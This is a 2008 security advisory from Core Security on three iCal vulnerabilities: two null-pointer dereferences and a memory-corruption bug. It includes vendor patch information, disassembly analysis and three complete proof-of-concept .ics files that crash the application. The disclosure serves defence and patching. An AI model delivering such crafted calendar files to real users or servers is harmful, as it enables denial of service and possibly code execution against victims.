Multiple vulnerabilities in iCal
Core Security Technologies - CoreLabs Advisory
Title: Multiple vulnerabilities in iCal
Advisory ID: CORE-2008-0126
Advisory URL: http://www.coresecurity.com/?action=item&id=2219
Date published: 2008-05-21
Date of last update: 2008-05-22
Vendors contacted: Apple Inc.
Release mode: Coordinated release
iCal is a personal calendar application from Apple Inc. included on the Mac OS X operating system. The calendar application can be used as a stand-alone application or as a client-side component to calendar server that lets users create and share multiple calendars and subscribe to other user's calendars. Apple's iCal uses the iCalendar standard for its calendar file format (which uses the
.ics filename extension)  and the CalDAV protocol for calendar sharing . There is a growing number of web sites providing calendars files and open subscription to calendar updates .
Three vulnerabilities discovered in the iCal application may allow un-authenticated attackers to execute arbitrary code on vulnerable systems with (and potentially without) the assistance from the end user of the application or to repeatedly execute a denial of service attack to crash the iCal application.
The most serious of the three vulnerabilities is due to potential memory corruption resulting from a resource liberation bug that can be triggered with a malformed
.ics calendar file specially crafted by a would-be attacker.
The other two vulnerabilities lead to abnormal termination (crash) of the iCal application due to null-pointer dereference bugs triggered while parsing a malformed
.ics files. The ability to inject and execute arbitrary code on vulnerable systems using these two vulnerabilities was researched but not proven possible.
Exploitation of these vulnerabilities in a client-side attack scenario is possible with user assistance by opening or clicking on specially crafted
.ics file send over email or hosted on a malicious web server; or without direct user assistance if a would-be attacker has the ability to legitimately add or modify calendar files on a CalDAV server.
Don't open untrusted
.ics calendar files sent by mail or provided by websites.
The following information was provided verbatim by the vendor:
Apple security updates are available via the Software Update mechanism: <http://support.apple.com/kb/HT1338>
Apple security updates are also available for manual download via: <http://www.apple.com/support/downloads/>
If you provide cross-referencing information in your advisory please link to the following URL: <http://support.apple.com/kb/HT1222>
These vulnerabilities were discovered and researched by Rodrigo Carvalho, from the Core Security Consulting Services (SCS) team of Core Security Technologies during Bugweek 2007. Additional research was done by Ricardo Narvaja from CORE IMPACT the Exploit Writers Team (EWT).
Three vulnerabilities discovered in the iCal application may allow un-authenticated attackers to execute arbitrary code on vulnerable systems with (and potentially without) the assistance from the end user of the application or to repeateadly execute a denial of service attack to crash the iCal application.
A client-side attack directed to the end-users of the iCal application can be executed by sending an email with a malicious .ics file attachment, by hosting a malicious .ics file on web site and directing users to open it or by injecting a malicious .ics file on a CalDAV enabled server to which potential victims are subscribed to update their calendars automatically. In the three reported cases the vulnerabilities arise from improper validation of input while or after parsing of the calendar file format.
1) Null pointer de-reference #1 (Bugtraq ID 28629, CVE-2008-2006)
Improper sanitization of integer input may lead to null pointer dereference and possibly to an application that loses control of its execution, resulting in a denial of service.
A vulnerable .ics file will contain the following line:
COUNT value causes an integer overflow, which leads to a null pointer dereference when iCal tries to use it after the .ics file is imported.
The following Proof of Concept (PoC) file is provided to demonstrate its feasibility, to trigger the bug import a .ics file with the following content and then select one of the created events.
BEGIN:VCALENDAR X-WR-TIMEZONE:America/Buenos_Aires PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN X-WR-CALNAME: Vulnerable VERSION:2.0 X-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:4 DTSTART;TZID=America/Buenos_Aires:20071225T110000 DURATION:PT1H UID:48878014-5F03-43E5-8639-61E708714F9A DTSTAMP:20071213T130632Z SUMMARY:Vuln CREATED:20071213T130611Z RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 END:VEVENT END:VCALENDAR
Analysis of the vulnerability
The above proof-of-concept file creates new events in the iCal application . When a user double-clicks on these events the program crashes writing in the memory pointed by pointer
EDI=0. Only the value of
EAX is under control, must be less than
0x7fffffff and is extracted from the following line of the PoC
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 (0x7FFFFFFE) __text:0013C178 push ebp __text:0013C179 mov ebp, esp __text:0013C17B sub esp, 38h __text:0013C17E mov eax, ds:off_1F435C __text:0013C183 mov [ebp+var_4], edi __text:0013C186 mov edi, [ebp+arg_C] __text:0013C189 mov [ebp+var_8], esi __text:0013C18C mov esi, [ebp+arg_8] __text:0013C18F mov [ebp+var_C], ebx __text:0013C192 mov [esp+38h+var_34], eax __text:0013C196 mov eax, [ebp+arg_0] __text:0013C199 mov [esp+38h+var_28], 0 __text:0013C1A1 mov [esp+38h+var_2C], 0
Here is written on
[ebp + var28] and
[ebp + var2C] and because
0x38, this is similar to
[ebp + var28] = [esp+0x38+var_28] [ebp + var2C] = [esp+0x38+var_2C]
There are located the null-pointers on the stack.
BFFFEF7C var_2C dd 0 BFFFEF80 var_28 dd 0
Upon reaching the function where the crash occurs.
__text:0014ADC3 push ebp __text:0014ADC4 mov ebp, esp __text:0014ADC6 sub esp, 48h __text:0014ADC9 mov eax, ds:stru_1FA2A0.superclass
Logically the zeros are still present because don't work with those values until we enter.
BFFFEF7C arg_C dd 0 BFFFEF80 arg_10 dd 0
We see that the function argument
arg_C is loaded and moved to
0014ADE0 mov edi, [ebp+arg_C]
And this is the location where is written at the moment of crashing further ahead, meaning that it is a zero that can't be changed.
0014AE2F mov dword ptr [edi], 0
When getting closer to the point of crash because we control
EAX and we can trigger a jump after comparing with
0014AE20 cmp eax, [ebx+0Ch] (if it is lower than 1) 0014AE23 jl short loc_14AE2F 0014AE25 cmp eax, [ebx+8] (if it is lower than 0x270F) 0014AE2D jle short loc_14AE37 169280B8 dd 270Fh (ebx+08) 169280BC dd 1 (ebx+0C)
The first comparison for
JL doesn't avoid the crash zone, but anyway negative numbers can't be inserted by default and a zero value does not crash the program or even gets it near the critical zone. Any other value crashes the application when writing in the null location.
In the other case a comparison is made such that if
EAX is less than
0x270f the crash zone is avoided and the program continues to work without problem. Negative values are not read and if a value greater than
0x7fffffff the maximum value is used instead.
2) Null pointer dereference #2 (Bugtraq ID 28632, CVE-2008-2006)
A vulnerable .ics file will contain the following line:
TRIGGER value causes a null pointer dereference when iCal tries to use it after the .ics file is imported.
The corresponding PoC follows. to trigger the bug import a .ics file with the following content then click on the 65535 on edit mode and accept it without changes.
BEGIN:VCALENDAR X-WR-CALNAME:Fake event PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN VERSION:2.0 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:10 DTSTART;TZID=America/Buenos_Aires:20071225T000000 DTSTAMP:20071213T124414Z SUMMARY:Fake Event DTEND;TZID=America/Buenos_Aires:20071225T010000 RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1 UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9 TRANSP:OPAQUE CREATED:20071213T124215Z BEGIN:VALARM X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49 ACTION:DISPLAY DESCRIPTION:Event reminder TRIGGER:-PT65535H END:VALARM END:VEVENT END:VCALENDAR
3) Improper resource liberation (Bugtraq ID 28633, CVE-2008-1035)
This is another case of bad validation of a file with the iCalendar format that results in a more serious bug.
A vulnerable .ics file will contain the following line:
The corresponding PoC follows. Double-click on the .ics file with the following content, an event will be created. To crash iCal click on the newly created event and the on the alarm sound list.
BEGIN:VCALENDAR X-WR-TIMEZONE:America/Buenos_Aires PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN X-WR-CALNAME:evento falso VERSION:2.0 X-WR-RELCALID:71CE8EAD-380B-4EA3-A123-60F9B2A03990 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:11 DTSTART;TZID=America/Buenos_Aires:20071225T000000 DTSTAMP:20071213T143420Z SUMMARY:evento falso DTEND;TZID=America/Buenos_Aires:20071225T010000 LOCATION:donde se hace RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1 TRANSP:OPAQUE UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9 URL;VALUE=URI:<http://pepe.com:443/pepe> ATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2 0-449C-88E7-744E62BC8C12/651D31BE-455E-45ED-99C6-55B9F03A3FA9/popote.php CREATED:20071213T142720Z CREATED:20071213T124215Z BEGIN:VALARM X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49 ACTION:DISPLAY DESCRIPTION:Event reminder TRIGGER:-PT15H END:VALARM BEGIN:VALARM X-WR-ALARMUID:F54A0E05-57B8-4562-8E77-056B19305CD0 ACTION:AUDIO TRIGGER:-PT15M ATTACH;VALUE=URI:S=osumi END:VALARM END:VEVENT END:VCALENDAR
 RFC 2445: Internet Calendaring and Scheduling Core Object Specification (iCalendar) - <http://tools.ietf.org/html/rfc2445>
 RFC 4791: Calendaring Extensions to WebDAV - <http://tools.ietf.org/html/rfc4791>
 iCalShare <http://icalshare.com/>
 iCalWorld <http://www.icalworld.com/>
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/.
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at /legacy/files/attachments/core_security_advisories.asc.